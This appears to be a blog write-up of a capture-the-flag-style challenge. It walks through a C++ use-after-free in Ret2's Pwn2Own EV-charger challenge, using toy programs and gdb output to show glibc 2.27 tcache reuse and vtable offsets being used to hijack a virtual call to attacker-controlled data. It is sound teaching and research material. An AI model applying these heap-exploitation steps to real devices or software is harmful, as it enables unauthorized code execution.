Analyzing C++ Compiler Vulnerabilities
Ret2 did a two-part writeup about a Pwn2Own 2024 challenge in which they exploited an electric vehicle charging station: the CHARX SEC-3100. Both the solution and the firmware (which is not encrypted) are available online. The firmware is 32-bit ARM and runs in a Linux environment, and the updates are all squashfs’ed, ready to be flashed or unpacked. Their exploit relied on a use-after-free vulnerability, coupled with some interesting side effects from both the code and the standard library version used.
To accompany the Pwn2Own writeups, Ret2 provides a public challenge as part of their wargames platform. To demonstrate the use-after-free vulnerability specifically, the first of the two writeups also includes some toy code. Both the challenge and the toy code contain the same UAF bug, which is triggered by the outer class’ destructor on exit.
I wanted to do a deeper dive into the conditions that lead to exploitation in both the toy code and the Wargames challenge code. The intention here is to walk through some C++ and GCC foundations to understand the problems they introduced in the firmware. Taken together, they pave the way to exploitation.
This analysis is broken up into a few parts, each of which builds on Ret2’s writeup:
- Understanding the role of C++ virtual functions (and how to spot them)
- Tracing what free‘d elements look like in glibc’s tcache
- Seeing how an older glibc standard affects code compilation and execution
- Leveraging the placement of virtual functions in the vtable
Each section contains a quote from the second writeup which explains where my thinking was during exploitation. This writeup mostly focuses on how the C++ code compiles; that understanding is really the key to solving the challenge.
Virtual Functions
Assuming we can control a node along this traversal, we can easily hijack control flow with the virtual call to get_connection_id.
Under the right conditions, you can hijack control flow by abusing virtual functions. This is a side effect of how they compile.
As a base case, let’s consider the following code:
class Item {
public:
void foo();
};
Implement Item::foo with an innocuous definition:
#include <stdio.h>

void Item::foo() {
printf("foo\n");
}
Then, call it inside main:
int main() {
Item item;
item.foo();
}
Compile it with debugging flags for clarity:
g++ -g demo.cpp -o demo
Then disassemble main:
(gdb) set print asm-demangle on
(gdb) disas main
Dump of assembler code for function main():
0x000000000000113a <+0>: push rbp
0x000000000000113b <+1>: mov rbp,rsp
0x000000000000113e <+4>: sub rsp,0x10
0x0000000000001142 <+8>: lea rax,[rbp-0x1]
0x0000000000001146 <+12>: mov rdi,rax
0x0000000000001149 <+15>: call 0x1156 <Item::foo()>
0x000000000000114e <+20>: mov eax,0x0
0x0000000000001153 <+25>: leave
0x0000000000001154 <+26>: ret
Item::foo compiles to its own function. Even if you compile without debug symbols, the invocation is still a call to a fixed address.
Now, let’s modify only the Item class to make foo virtual:
class Item {
public:
virtual void foo();
};
Again, compile with debugging flags and disassemble main:
(gdb) disas main
Dump of assembler code for function main():
<+0>: push rbp
<+1>: mov rbp,rsp
<+4>: sub rsp,0x10
<+8>: lea rax,[rip+0x2c6f] # 0x3db8 <vtable for Item+16>
<+15>: mov QWORD PTR [rbp-0x8],rax
<+19>: lea rax,[rbp-0x8]
<+23>: mov rdi,rax
<+26>: call 0x1160 <Item::foo()>
<+31>: mov eax,0x0
<+36>: leave
<+37>: ret
Here, too, the call targets a fixed address: because the object lives on the stack and its exact type is known, the compiler can bypass the vtable entirely.
Recall that in main, we use a stack instance of Item. Let’s refactor it to use a heap pointer instead:
int main() {
Item *item_ptr = new Item{};
item_ptr->foo();
}
Notice how the invocation changes:
Dump of assembler code for function main():
0x000000000000115a <+0>: push rbp
0x000000000000115b <+1>: mov rbp,rsp
0x000000000000115e <+4>: push rbx
0x000000000000115f <+5>: sub rsp,0x18
0x0000000000001163 <+9>: mov edi,0x8
0x0000000000001168 <+14>: call 0x1030 <operator new(unsigned long)@plt>
0x000000000000116d <+19>: mov rbx,rax
0x0000000000001170 <+22>: mov QWORD PTR [rbx],0x0
0x0000000000001177 <+29>: mov rdi,rbx
0x000000000000117a <+32>: call 0x11d6 <Item::Item()>
0x000000000000117f <+37>: mov eax,0x0
0x0000000000001184 <+42>: mov QWORD PTR [rbp-0x18],rbx
0x0000000000001188 <+46>: test al,al
0x000000000000118a <+48>: je 0x1199 <main()+63>
0x000000000000118c <+50>: mov esi,0x8
0x0000000000001191 <+55>: mov rdi,rbx
0x0000000000001194 <+58>: call 0x1040
0x0000000000001199 <+63>: mov rax,QWORD PTR [rbp-0x18]
0x000000000000119d <+67>: mov rax,QWORD PTR [rax]
0x00000000000011a0 <+70>: mov rdx,QWORD PTR [rax]
0x00000000000011a3 <+73>: mov rax,QWORD PTR [rbp-0x18]
0x00000000000011a7 <+77>: mov rdi,rax
0x00000000000011aa <+80>: call rdx
0x00000000000011ac <+82>: mov eax,0x0
0x00000000000011b1 <+87>: mov rbx,QWORD PTR [rbp-0x8]
0x00000000000011b5 <+91>: leave
0x00000000000011b6 <+92>: ret
The actual function call is at main+80:
(gdb) b *main+80
(gdb) r
Breakpoint 1, in main ()
(gdb) x/i $pc
=> 0x5555555551aa <main()+80>: call rdx
(gdb) ni
foo
So, the virtual function is set up with this chunk of instructions, and invoked with the call to RDX:
0x0000000000001199 <+63>: mov rax,QWORD PTR [rbp-0x18]
0x000000000000119d <+67>: mov rax,QWORD PTR [rax]
0x00000000000011a0 <+70>: mov rdx,QWORD PTR [rax]
0x00000000000011a3 <+73>: mov rax,QWORD PTR [rbp-0x18]
0x00000000000011a7 <+77>: mov rdi,rax
0x00000000000011aa <+80>: call rdx
This is conceptually similar to the way function pointers work in standard C. Observe that the call to fptr is also a call through a register, RDX:
$ cat fptr.c
#include <stdio.h>
void do_something() {
printf("Hello\n");
}
int main() {
void (*fptr)() = 0;
fptr = &do_something;
fptr();
}
$ objdump --disassemble=main -Mintel fptr
...
<main>:
push rbp
mov rbp,rsp
sub rsp,0x10
mov QWORD PTR [rbp-0x8],0x0
lea rax,[rip+...] # <do_something>
mov QWORD PTR [rbp-0x8],rax
mov rdx,QWORD PTR [rbp-0x8]
mov eax,0x0
call rdx
mov eax,0x0
leave
ret
A major difference, however, is what’s happening behind the scenes. Every class that defines virtual functions gets a “vtable”: a table in memory containing the address of each virtual function, and every instance carries a pointer to that table in its first quadword. We can illustrate the vtable dereference chain by annotating the disassembly:
mov rax, [...] // *item
mov rax, [rax] // item->vtable
mov rdx, [rax] // item->vtable->foo
...
call rdx // call item->vtable->foo()
An interesting property of vtables is that, because the call pulls a function pointer from some offset into the table, adding more virtual functions changes those offsets. Slots are usually laid out in declaration order (although that’s not a guarantee you should rely on). Let’s check this out:
class Item {
public:
virtual void bar();
virtual void foo();
};
You can define bar however you want, but we won’t be using it. Compile the code and disassemble it again. Note the change to the virtual call instructions:
mov rax,QWORD PTR [rbp-0x18]
mov rax,QWORD PTR [rax]
add rax,0x8
mov rdx,QWORD PTR [rax]
...
call rdx
The ADD RAX,0x8 instruction queries the vtable a little differently:
item->(vtable+0x8)->foo()
The address of Item::foo now lives at offset 0x8 in Item’s vtable.
Glibc’s tcache
Fully understanding glibc tcache internals isn’t necessary here; it suffices to say that a tcache bin is just a singly-linked list of free chunks of the same size, where the next pointer is placed at offset 0 in the free chunk.
The tcache is a glibc-internal mechanism. It provides a way for the memory allocator to quickly reuse memory from per-size “buckets” instead of searching the entire heap on every allocation.
Unfortunately, it can be abused. Over the years, it has served as the object of a few different exploit classes involving dynamic memory allocation. We consider it in the context of a particular use-after-free (UAF) bug which involves a tcache entry and a free’d std::vector.
The tcache was introduced in glibc 2.26 back in 2017, and it still plays a major role in the memory allocator today. There is a great video on tcache behavior and a good walkthrough of the source code. We’ll cover some basics and really focus on how they apply to the std::vector type.
Let’s start by exploring the tcache entry. In glibc, tcache_entry is both a struct and a typedef of that struct:
typedef struct tcache_entry
{
  struct tcache_entry *next;
  struct tcache_perthread_struct *key; // Avoids double-frees.
} tcache_entry;
The std::vector type is a C++ template for a dynamically sized, contiguous array that can store arbitrary data types. Under the hood, it involves some dynamic memory allocations. It is a focus area of the Wargame challenge and is also the focus of discussion here.
Let’s start with some driver code.
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <vector>
int main() {
std::vector<uint64_t> v;
v.push_back(3);
v.push_back(5);
v.push_back(9);
v.push_back(13);
// Print the contents.
printf("0x%" PRIu64 " 0x%" PRIu64 " 0x%" PRIu64 " 0x%" PRIu64 "\n", v[0], v[1], v[2], v[3]);
// Explicitly destroy the vector.
v.~vector();
// Intentionally do a use-after free.
printf("0x%" PRIu64 " 0x%" PRIu64 " 0x%" PRIu64 " 0x%" PRIu64 "\n", v[0], v[1], v[2], v[3]);
}
This code prints the following:
0x3 0x5 0x9 0x13
0x188703 0x5337669691617803236 0x9 0x13
free(): double free detected in tcache 2
The first row is what we, the developers, expected. The second row is the consequence of using the vector after a free operation. There are two important callouts with respect to the second row:
- The elements at v[0] and v[1] hold data from a tcache entry: specifically, the next and key fields
- The “double free” error implies that destroying a vector involves some dynamic memory deallocation of its own
At the crash site, *next holds 0x188703 and *key holds 0x5337669691617803236. Tcache entries exist only after you have free‘d some allocated memory. In C++, that can happen through destructors, the delete operator, and classic calls to the free standard library function.
struct tcache_entry *next: 0x188703
struct tcache_perthread_struct *key: 0x5337669691617803236
Tcache bins are linked lists of free‘d chunks of the same size class. On 64-bit glibc, chunk sizes step in 16-byte increments starting at 0x20: 0x20, 0x30, 0x40, and so on. The logic that defines each bin size lives in malloc.c, and like many things in glibc, its true definition is shrouded in macros.
Developers can use the output of the malloc_usable_size function to help determine which bin an allocation will be free‘d into. Otherwise, you’re left with the debugger, but that’s sometimes all you really need.
In this example, the value of *next (0x188703) is not a valid address and will not dereference to anything. This is expected because only one object of that bin’s size has been free‘d. If another object of an equivalent size had been free‘d before the vector, *next would point to it instead. So, to control the tcache, we need to free something else: something other than the vector, but of the same size.
Let’s do that now.
Finding allocation sizes for tcache bins
When this node is freed during the list destructor, the chunk will have a size class of 0x68, and will be placed into the tcache bin of that size
Here, we want to determine the size class of the chunk that gets free‘d when a vector is destroyed.
If you read the source code for a vector, you’ll notice that the vector class template actually extends the _Vector_base structure, whose first field is a _Vector_impl named _M_impl, with a couple of allocation and deallocation methods defined near it. This _M_impl structure is the backend of the vector type and is responsible for many of its dynamic behaviors.
Its first field, _M_start, points to the first element in the vector’s backing buffer. In fact, because _M_impl is the vector’s first field, the address of a vector is the address of this structure.
When the vector’s own destructor runs, it invokes the ~_Vector_base destructor last. Here’s the pared-down destructor definition for clarity:
~_Vector_base()
{
  ptrdiff_t __n = _M_impl._M_end_of_storage - _M_impl._M_start;
  _M_deallocate(_M_impl._M_start, size_t(__n));
}
The _M_deallocate function has a call path that leads to free. It’s traceable in static analysis, but also a bit of a pain; it’s easier to appreciate in the debugger.
We can break at the call to the vector’s destructor in main, inspect the argument given, and then break on free. When we land at the invocation of free, we find that the vector’s backing buffer is being free‘d: that is, the buffer pointed to by _M_impl._M_start (0x55555556b2f0 in this run).
Breakpoint 6, in main
(gdb) x/i $pc
=> <main()+376>: call std::vector<>::~vector
(gdb) x/gx $rdi
0x7fffffffe150: 0x000055555556b2f0
(gdb) b *free
(gdb) c
Breakpoint 7, __GI___libc_free
(gdb) bt
#0 __GI___libc_free
#1 std::__new_allocator<>::deallocate
#2 std::allocator_traits<>::deallocate
#3 std::_Vector_base<unsigned long, std::allocator<unsigned long> >::_M_deallocate
#4 std::_Vector_base<unsigned long, std::allocator<unsigned long> >::~_Vector_base
#5 std::vector<unsigned long, std::allocator<unsigned long> >::~vector
#6 main
(gdb) print/x $rdi
$8 = 0x55555556b2f0
Continue execution and notice that free is called only one time. So, the buffer pointed to by _M_start is our culprit for tcache binning.
If we can find the size of that backing buffer when the vector is destroyed, we know which tcache bin the free’d chunk lands in, and therefore which allocation sizes will share a bin with it. In this way, we also find a link to its next pointer. To help our analysis, we can reverse the logic from before and track which vector method actually allocates the memory.
First, let’s acknowledge that the backing buffer is allocated only after the vector is given some elements. We can observe this by tracking the memory from the vector’s creation until the first call to push_back:
// The vector's internal structure is initialized to null.
(gdb) x/i $pc
=> main+20: call std::vector<>::vector
(gdb) x/gx $rdi
0x7fffffffe150: 0x00000000000011ff
(gdb) ni
(gdb) x/gx $rdi
0x7fffffffe150: 0x0000000000000000
(gdb) c
Continuing.
// The structure after the first call to vector::push_back.
Breakpoint 2 in main
(gdb) x/i $pc
=> main+47: call std::vector<>::push_back
(gdb) x/gx $rdi
0x7fffffffe150: 0x0000000000000000
(gdb) ni
(gdb) x/gx $rdi
0x7fffffffe0b0: 0x000055555556b2b0
We can then set a breakpoint on malloc
and continue execution to see the call path:
Breakpoint 1, main () at demo.cpp:6
(gdb) b *malloc
(gdb) c
Breakpoint 2, __GI___libc_malloc (bytes=8) at ./malloc/malloc.c:3301
(gdb) bt
#0 malloc
#1 operator new
#2 std::__new_allocator<>::allocate
#3 std::allocator_traits<>::allocate
#4 std::_Vector_base<>::_M_allocate
#5 std::vector<>::_M_realloc_append<>
#6 std::vector<>::emplace_back<>
#7 std::vector<>::push_back
#8 main
We can see that the call to push_back leads to the allocation. Because malloc accepts one argument, a size_t, we can see the initial allocation size by printing its first and only argument:
(gdb) print/x $rdi
$1 = 0x8
Indeed, 64-bit integers are eight bytes, so this matches our expectations.
Now, recall that an invocation of push_back calls malloc whenever the vector has run out of capacity. This has some interesting implications.
To appreciate this, we will augment the non-pointer vector example with a call to malloc_usable_size, whose result is the value we need in order to exploit the main code. I intentionally leave out any initial calls to push_back so we can observe the output.
#include <vector>
#include <stdlib.h>
#include <malloc.h>
#include <stdio.h>
int main() {
std::vector<int> v;
auto v_data = v.data();
auto v_cast = static_cast<void*>(v_data);
auto v_usable = malloc_usable_size(v_cast);
printf("Vector backing usable: 0x%lx\n", v_usable);
}
This prints:
Vector backing usable: 0x0
This makes sense because we haven’t actually given the vector any backing memory yet. If we add one invocation of v.push_back(x), we get 0x18 (glibc’s minimum usable size of 24 bytes). After five invocations, the requested backing size has grown to 32 bytes and we get 0x28 (40 usable bytes), and so on.
Observe some other interesting behaviors:
- If you break on each execution of malloc and inspect the argument at RDI, you can see the vector’s requested backing size grow to 4, 8, 16, and 32 bytes, respectively.
- We can semi-formalize this growth as 2^(2+N-1) for the Nth reallocation, N > 0. The base 2^2 = 4 works out here because we’re using a vector of integers, and an int is four bytes (32 bits). If this were a vector of 64-bit integers, we would adjust it to 2^(3+N-1), given 2^3 = 8.
- Likewise, if you run something like v.erase(v.begin()), the backing allocation will not shrink.
- Finally, the call to v.~vector will free the backing buffer, whose final size is whatever it grew to after all those calls to push_back.
Exploiting older tcache implementations
Set a config value to a string of size 0x60 … UAF list traversal goes to 2nd fake node (the freed config string)
Strings can be convenient ways to control data. Here, they can play an interesting role in how the tcache works during a use-after-free condition.
Let’s build on the driver code from the tcache discussion and add some string allocations and deallocations:
#include <inttypes.h>
#include <stdio.h>
#include <vector>
#include <cstring>
const char *NAME = "AAAAAAAA"
"AAAAAAAA"
"AAAAAAAA"
"AAAAAAAA"
"AAAAAAAA"
"AAAAAAAA"
"AAAAAAAA"
"AAAAAAA";
int main() {
std::vector<uint64_t> v;
char *name = nullptr;
v.push_back(3);
v.push_back(5);
v.push_back(9);
v.push_back(13);
name = new char[0x40];
strncpy(name, (char *)NAME, 0x3f);
printf("%s\n", name);
delete[] name;
v.~vector();
printf("%lu\n", v[0]);
}
If we compile it against a more recent glibc, it won’t do anything of interest, and we can’t control much. So let’s take a detour and see which versions are used by the Wargames challenge and the CHARX project. Recall that the CHARX firmware is available online and not encrypted, and that this specific Wargames challenge is open to the public, so it’s fair game to inspect them.
The CHARX executables were likely built with glibc 2.29:
strings CharxControllerAgent | grep -i GLIBC_
GLIBC_2.4
GLIBC_2.29
GLIBC_2.8
GLIBC_2.28
GLIBC_2.15
GLIBC_2.17
GLIBC_2.7
Likewise, the Wargames platform is likely using glibc 2.27:
wdb> vmmap
0x400000-0x409000 r-x charxpost_destructors
...
0x7f0000000000-0x7f0000029000 r-x ld-2.27.so
...
0x7f00007c4000-0x7f00009ab000 r-x libc-2.27.so
...
This gives us a range of versions to try out. The obvious way is to build glibc, ldd, and gcc using the specified versions. This would give us a chance to explore the differences in source code and further understand what changes in the memory allocator between old and current versions.
For now, we’re going to take a shortcut and just use an old Ubuntu container image, which is up to the spec we need:
root@cba6a210200c:/# grep VERSION= /etc/os-release
VERSION="18.04.6 LTS (Bionic Beaver)"
root@cba6a210200c:/# ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1.6) 2.27
We can substitute the g++ CLI with a container that does the same thing for the version we need:
$ cat Dockerfile
FROM ubuntu:18.04
RUN apt update && \
apt install -y --no-install-recommends g++
ENTRYPOINT ["g++"]
$ docker build -t ret2gpp .
Then build the application, passing the g++ options through as container arguments:
docker run -v "$(pwd)":/code --rm ret2gpp \
-g -static /code/demo.cpp -o /code/demo
Note: The use of -static here is essential. Because any modern host system likely ships a different version of libc, you probably won’t observe the same behavior as you would on a system with the old libc installed. By compiling statically, we get a portable binary that preserves those behaviors across different x64 systems.
Let’s open it in GDB and break on the instruction just after the vector’s [] operator:
(gdb) disas main
...
0x0000000000400cf9 <+268>: call 0x400e10 <vector::operator[]>
0x0000000000400cfe <+273>: mov rax,QWORD PTR [rax]
...
(gdb) b *main+273
Breakpoint 1 at 0x400cfe: file /code/ver.cpp, line 32.
(gdb) r
...
Breakpoint 1, 0x0000000000400cfe in main () at /code/ver.cpp:32
32 printf("%lu\n", v[0]);
(gdb) x/i $pc
=> 0x400cfe <main()+273>: mov rax,QWORD PTR [rax]
(gdb) x/4gx $rax
0x6ee7a0: 0x00000000006ee7f0 0x00000000006dc1d0
0x6ee7b0: 0x0000000000000009 0x000000000000000d
Because we allocated and free’d a string of the same usable size as the vector’s backing buffer, the value of tcache_entry->next at RAX (0x6ee7a0) should point to that free’d entry:
(gdb) x/4gx 0x00000000006ee7f0
0x6ee7f0: 0x0000000000000000 0x00000000006dc1d0
0x6ee800: 0x4141414141414141 0x4141414141414141
The hex-encoded “A”s mean we were correct. This is the final tcache entry in this bin.
The important aspect here is that you have a way to control a buffer’s allocation size so you can match it against the target (here, the vector’s internal structure size). You can use previously discussed techniques to find it and adjust the string allocation. For example, the following patch to the code used in this section would work for a one-item vector.
...
std::vector<uint64_t> v;
v.push_back(3);
//printf("%lu\n", malloc_usable_size(static_cast<void*>(v.data()))); // 24
name = new char[24];
strncpy(name, (char *)NAME, 23);
...
You’ll notice the first sixteen “A”s were wiped out by the tcache_entry data, leaving only the final eight:
(gdb) x/4gx $rax
0x6f2730: 0x00000000006f2750 0x00000000006e01d0
0x6f2740: 0x0000000000000000 0x0000000000000021
(gdb) x/4gx 0x00000000006f2750
0x6f2750: 0x0000000000000000 0x00000000006e01d0
0x6f2760: 0x4141414141414141 0x0000000000000411
It should be obvious from the disassembly, but at this point the strings provide no real advantage for exploitation. That’s entirely because we’re just pulling a long unsigned int (i.e., the tcache entry) and printing its value.
0x0000000000400cba <+205>: mov rax,QWORD PTR [rax]
0x0000000000400cbd <+208>: mov rsi,rax
...
0x0000000000400ccc <+223>: call 0x428ff0 <printf>
If we could steer the program into reading data from tcache_entry->next+16, we might gain some advantage for exploitation: either a read or an execution.
The benefits of vtables
Our primitive has evolved from a simple UAF into an arbitrary virtual call
So far, we’ve considered two different types of code: that which uses virtual functions, and code that uses vulnerable tcache versions. Let’s combine the two concepts:
class Item {
public:
virtual void do_something();
};
...
int main() {
std::vector<Item *> v;
char *name = nullptr;
v.push_back(new Item{});
v[0]->do_something();
name = new char[24];
strncpy(name, (char *)NAME, 23);
printf("%s\n", name);
delete[] name;
v.~vector();
v[0]->do_something();
}
It will crash just before the virtual call to do_something:
(gdb) x/i $pc
=> 0x400cf5 <main()+231>: mov rdx,QWORD PTR [rdx]
(gdb) x/gx $rax
0x6f2b80: 0x0000000000000000
(gdb) disas main
0x0000000000400cea <+220>: call 0x400e2e <vector::operator[]>
0x0000000000400cef <+225>: mov rax,QWORD PTR [rax]
0x0000000000400cf2 <+228>: mov rdx,QWORD PTR [rax]
=> 0x0000000000400cf5 <+231>: mov rdx,QWORD PTR [rdx]
...
0x0000000000400cfb <+237>: call rdx
This is no surprise given the data we looked at earlier. Zero is the value at 0x6f2750:
(gdb) x/4gx $rax
0x6f2730: 0x00000000006f2750 0x00000000006e01d0
0x6f2740: 0x0000000000000000 0x0000000000000021
(gdb) x/4gx 0x00000000006f2750
0x6f2750: 0x0000000000000000 0x00000000006e01d0
0x6f2760: 0x4141414141414141 0x0000000000000411
We can visualize it like:
mov rax, [rax] // *item
mov rdx, [rax] // item->vtable
mov rdx, [rdx] // item->vtable->do_something (fails to dereference 0x0)
So, it fails when trying to dereference do_something. This is completely understandable because we are, again, exploiting a use-after-free condition. The “vtable” pointer really points into the tcache’s next pointer: the free‘d chunk starts with the sixteen bytes of a tcache entry, followed by whatever data remains.
Recall that tcache bins are singly-linked lists, where each free‘d chunk’s first quadword points to the next free‘d chunk of the same bin size (or zero at the end of the list). To (sort of) complete the vtable dereference, we can allocate and free another string buffer whose size lands in the same bin.
To keep it simple, let’s use an array of two names and perform the same allocation and deallocation operations on each element:
char *names[2];
...
for (int i = 0; i < 2; i++) {
names[i] = new char[24];
strncpy(names[i], (char *)NAME, 23);
printf("%s\n", names[i]);
}
for (int i = 0; i < 2; i++) {
delete names[i];
}
...
The extra free‘d string buffer gives us one more node to traverse in the tcache list:
(gdb) x/5i $pc
=> 0x400d28 <main()+282>: mov rax,QWORD PTR [rax]
0x400d2b <main()+285>: mov rdx,QWORD PTR [rax]
0x400d2e <main()+288>: mov rdx,QWORD PTR [rdx]
0x400d31 <main()+291>: mov rdi,rax
0x400d34 <main()+294>: call rdx
(gdb) x/4gx $rax
0x6f2750: 0x00000000006f2ba0 0x00000000006e01d0
0x6f2760: 0x0000000000000000 0x0000000000000411
(gdb) x/4gx 0x00000000006f2ba0
0x6f2ba0: 0x00000000006f2b80 0x00000000006e01d0
0x6f2bb0: 0x0041414141414141 0x000000000000f451
(gdb) x/4gx 0x00000000006f2b80
0x6f2b80: 0x0000000000000000 0x00000000006e01d0
0x6f2b90: 0x0041414141414141 0x0000000000000021
This completes the dereference path, but points it at data that we almost control. Execution will make it to CALL RDX, but RDX will be zero: the value stored at 0x6f2b80.
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
(gdb) bt
#0 0x0000000000000000 in ?? ()
#1 0x0000000000400d36 in main ()
Recall from the earlier section on virtual functions that the vtable may adjust the target quadword that is dereferenced. If we add more virtual functions, we should be able to gain some control over execution.
Right now, the vtable looks like this, because it has one virtual function:
offset target function
------ ----------------
0x0 do_something
Let’s redefine Item to include one new virtual function:
class Item {
public:
virtual void foo();
virtual void do_something();
};
This should adjust the vtable to look like this:
offset target function
------ ----------------
0x0 foo
0x8 do_something
Implement Item::foo however you want. Then compile, and observe that an offset of 0x8 is added to the virtual call instructions:
0x0000000000400d2c <+286>: mov rax,QWORD PTR [rax]
0x0000000000400d2f <+289>: mov rdx,QWORD PTR [rax]
0x0000000000400d32 <+292>: add rdx,0x8
0x0000000000400d36 <+296>: mov rdx,QWORD PTR [rdx]
...
0x0000000000400d3c <+302>: call rdx
Let it run and let it crash:
Program received signal SIGSEGV, Segmentation fault.
0x00000000006e01d0 in ?? ()
Now, instead of failing at tcache_entry->next, it fails at the fake tcache_entry->key:
(gdb) x/4gx 0x00000000006f2b80
0x6f2b80: 0x0000000000000000 0x00000000006e01d0
0x6f2b90: 0x0041414141414141 0x0000000000000021
So, this matches what we expected to happen.
Now, let’s add a final trivial virtual function, bar, to complete the vtable and gain some control over the execution:
offset target function
------ ----------------
0x0 foo
0x8 bar
0x10 do_something
CALL RDX now points to whatever we inserted in the buffer earlier:
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400d3c in main ()
42 v[0]->do_something();
(gdb) x/i $pc
=> 0x400d3c <main()+302>: call rdx
(gdb) print/x $rdx
$1 = 0x41414141414141
If the data we added to the string buffers was something more useful, like the address of an unreachable function, that function would execute here.
Wargames Writeup
Let’s jump into the challenge.
Use static analysis to make the following observations:
- The Charger class nests a ChargePortManager, which invokes a callback function on_port_disconnected. This is nearly identical to the dangerous behaviors described in the blog posts.
- The Charger instance is declared at global scope. This behaves much like the writeups’ explanation of static instances in the main scope: its destructor is called after main returns, during program teardown, so any weird behaviors won’t be obvious in static analysis.
- There is an opportunity to create string buffers of arbitrary size. These are the “names” of the two charge plug types. We can try to control data when these values are created (with new) and send them to the tcache when they are free’d (with delete).
- Although there’s no clear confirmation here, we can see references to libc 2.27 in output from vmmap and info proc mappings, so it’s reasonable to suspect an older tcache implementation.
Start the program and don’t do anything (select option 6). Notice it exits gracefully.
Choice:
>> 6
==== EXECUTION FINISHED ====
Rerun the program and create one charge connector with option 1. You can choose either of the two connector types. For now, don’t give it a name.
Choice:
>> 1
Type of charging gun?
1. Standard
2. High Ampacity
Choice:
>> 1
Enter length of description (0 for no description):
>>
Charge gun added!
After the charge gun is added, exit the program with option 6. Notice it crashes hideously:
Choice:
>> 6
Segmentation Fault
rax: 0x0000000000000000
rbx: 0x0000000000000000
rcx: 0x0000000000000000
rdx: 0x00007fffffffeca0
rsi: 0x00007fffffffeca0
rdi: 0x00007fffffffec98
rbp: 0x00007fffffffecc0
rsp: 0x00007fffffffec80
rip: 0x000000000040205e
r8: 0x00007fffffffed93
r9: 0x0000000000000000
r10: 0x0000000000000006
r11: 0x00007f000085ba30
r12: 0x00007f0000baf718
r13: 0x0000000000000007
r14: 0x00007f0000bb4708
r15: 0x00007f0000bb0d80
fs: 0x0000000000000000
gs: 0x0000000000000000
eflags: 0x0000000000000000
Let’s inspect where the crash occurred:
wdb> backtrace
0x40205e in Charger::on_port_disconnected ()
0x401f23 in ChargePortManager::disconnect_port ()
0x401d91 in ChargePortManager::~ChargePortManager ()
0x40591e in Charger::~Charger ()
0x7f0000807161 in ()
wdb> x/i $pc
0x40205e <Charger::on_port_disconnected+120>: mov rax, qword ptr [rax]
Check out its source code:
void on_port_disconnected(int p) {
for (ChargeGun* gun : guns)
if (gun->uses_port(p)) {
gun->plugged_in = false;
break;
}
}
Now, zoom out of the disassembly, around the area of the crash:
0x40204e <+104>: call 0x402696 <__normal_iterator<ChargeGun**, std::vector<ChargeGun*> >::operator*>
0x402053 <+109>: mov rax, qword [rax]
0x402056 <+112>: mov qword [rbp-0x10], rax
0x40205a <+116>: mov rax, qword [rbp-0x10]
0x40205e <+120>: mov rax, qword [rax]
0x402061 <+123>: add rax, 0x10
0x402065 <+127>: mov rax, qword [rax]
0x402068 <+130>: mov ecx, dword [rbp-0x3c]
0x40206b <+133>: mov rdx, qword [rbp-0x10]
0x40206f <+137>: mov esi, ecx
0x402071 <+139>: mov rdi, rdx
0x402074 <+142>: call rax
The CALL RAX instruction should stand out as the virtual call made inside on_port_disconnected. We can backtrack some of the other steps to make sense of the behavior:
<+104>: call 0x402696 <__normal_iterator<ChargeGun**, std::vector<ChargeGun*> >::operator*>
<+109>: mov rax, qword [rax]       ; Dereference the iterator: ChargeGun*
<+112>: mov qword [rbp-0x10], rax  ;
<+116>: mov rax, qword [rbp-0x10]  ; Address of the gun
<+120>: mov rax, qword [rax]       ; gun->vtable
<+123>: add rax, 0x10              ; gun->vtable + 0x10
<+127>: mov rax, qword [rax]       ; gun->(vtable+0x10): uses_port
<+130>: mov ecx, dword [rbp-0x3c]  ;
<+133>: mov rdx, qword [rbp-0x10]  ;
<+137>: mov esi, ecx               ; Value of p
<+139>: mov rdi, rdx               ; Address of the gun (this)
<+142>: call rax                   ; call uses_port(p)
We can see it’s crashing while dereferencing the gun pointer pulled from the free’d vector, a side effect of the UAF condition. You can break here, restart the application, and remove a connector (option 2) to see the expected behavior and trace through to the resolved address of uses_port.
Breakpoint 1: 0x40205e, Charger::on_port_disconnected+120
wdb> x/8i $pc
0x40205e <Charger::on_port_disconnected+120>: mov rax, qword ptr [rax]
0x402061 <Charger::on_port_disconnected+123>: add rax, 0x10
0x402065 <Charger::on_port_disconnected+127>: mov rax, qword ptr [rax]
0x402068 <Charger::on_port_disconnected+130>: mov ecx, dword ptr [rbp - 0x3c]
0x40206b <Charger::on_port_disconnected+133>: mov rdx, qword ptr [rbp - 0x10]
0x40206f <Charger::on_port_disconnected+137>: mov esi, ecx
0x402071 <Charger::on_port_disconnected+139>: mov rdi, rdx
0x402074 <Charger::on_port_disconnected+142>: call rax
wdb> print $rax
$3 = 0x61cea0
wdb> x/x $rax
0x61cea0: 0x00608d20
wdb> x/x 0x00608d20+0x10
0x608d30: 0x00401bdc
wdb> x/x 0x00401bdc
0x401bdc: 0xe5894855
wdb> x/i 0x00401bdc
0x401bdc <StandardChargeGun::uses_port+0>: push rbp
Here, you can see we created a StandardChargeGun subtype, so that's where the function resolves. Additionally, you'll notice that ChargeGun::uses_port has no debugger labels, so you'll need to pay attention to the subclass implementations. The fact that the call site maps to a common supertype is important to keep in mind.
Now that we better understand the intended behavior of this method, let's circle back to the actual, problematic behavior. We proved that the UAF condition can manifest simply by creating a charge plug. If we control the vtable, we control the code pointer used in the call to ChargeGun::uses_port.
As noted earlier, there are indications that this binary is using glibc 2.27:
wdb> info proc mappings
...
0x7f0000000000-0x7f0000029000 r-x ld-2.27.so
0x7f0000029000-0x7f000002b000 rw-
0x7f000002b000-0x7f000002e000 rw-
0x7f0000229000-0x7f000022a000 r-- ld-2.27.so
0x7f000022a000-0x7f000022c000 rw- ld-2.27.so
...
0x7f00007c4000-0x7f00009ab000 r-x libc-2.27.so
0x7f00009ab000-0x7f0000bab000 --- libc-2.27.so
0x7f0000bab000-0x7f0000baf000 r-- libc-2.27.so
0x7f0000baf000-0x7f0000bb1000 rw- libc-2.27.so
We can recall the tcache behavior and how the use of character buffers facilitates arbitrary execution. As it turns out, we have an opportunity to abuse this if we look at the ChargeGun::description field:
class ChargeGun {
public:
...
char* description;
ChargeGun() : plugged_in(false), description(0) {}
virtual ~ChargeGun() { delete description; }
...
};
You'll notice that neither the supertype nor its subclasses has a method to safely handle or sanitize the description. Instead, as a public field, other functions can directly read and write that value. Only the supertype's destructor plays any role in attempting to handle its destruction; but, as we will see shortly, the behavior as defined is insufficient.
